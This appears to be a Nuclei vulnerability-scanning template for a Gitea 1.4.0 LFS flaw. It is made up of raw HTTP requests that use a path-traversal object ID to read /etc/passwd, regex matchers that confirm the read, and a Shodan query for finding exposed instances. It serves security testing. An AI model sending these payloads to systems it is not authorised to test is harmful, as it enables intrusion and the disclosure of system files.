nuclei-templates/http/vulnerabilities/gitea/gitea-rce.yaml

62 lines
1.5 KiB
YAML

id: gitea-rce
info:
name: Gitea 1.4.0 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
Gitea 1.4.0 is vulnerable to remote code execution.
reference:
- https://www.exploit-db.com/exploits/44996
- https://github.com/kacperszurek/exploits/blob/master/Gitea/gitea_lfs_rce.py
metadata:
max-request: 3
verified: true
shodan-query: 'title:"Installation - Gitea: Git with a cup of tea"'
tags: gitea,rce,unauth,edb
http:
- raw:
- |
GET /api/v1/repos/search?limit=1 HTTP/1.1
Host: {{Hostname}}
- |
POST /{{repo}}.git/info/lfs/objects HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: application/vnd.git-lfs+json
{
"Oid": "....../../../etc/passwd",
"Size": 1000000,
"User" : "{{randstr}}",
"Password" : "{{randstr}}",
"Repo" : "{{randstr}}",
"Authorization" : "{{randstr}}"
}
- |
GET /{{repo}}.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "root:.*:0:0:"
- type: word
part: header_3
words:
- "application/octet-stream"
extractors:
- type: regex
name: repo
group: 1
regex:
- '"name":".*","full_name":"(.*)","description"'
internal: true